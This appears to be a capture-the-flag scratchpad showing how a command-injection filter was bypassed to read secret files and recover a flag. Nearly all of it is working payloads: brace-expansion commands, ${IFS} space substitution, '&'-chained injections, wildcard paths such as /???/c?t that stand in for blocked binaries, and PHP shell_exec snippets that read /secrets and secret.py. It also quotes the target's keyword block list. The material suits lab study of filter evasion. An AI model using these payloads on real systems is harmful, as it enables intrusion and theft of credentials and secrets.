{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt
/&pwd/&pwd
/var/task&{cat,secret.py}
{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}
Found this hiding behind ... instead of . ..
{/var/task/...,-la}
ls -la /secrets
$cmd = "ls -la /secrets" && $output = shell_exec($cmd);
$c=p $m=w $d=d && $output = shell_exec($c$m$d);
ls -la /secrets
/???/?s
/bin/ps
/???/?s /s?????s
"flag","f","l","a","g"
/???/??t
$egress_ruleset = array("BLAB","{","}",
"flag","secret","password","ssn","confidential");
file
flag
password
pins
ssn
/???/??t ./pins
/???/c?t
/???/?s ..ls works
/???/e??o hi ..echo works!!!
/???/c?t /s?????s/
/u??/???/?s ..might be 'ls' ?
/u??/???/c?t ..might be 'cat' ?
/u??/???/c?t -c1 /s????ts/????
Answer:
cut -b8-30
/u??/???/c?t -b1-5 /s????ts/????
/u??/???/c?t -b8-30 /s????ts/????
FLAG{waf_3vision_w1n}
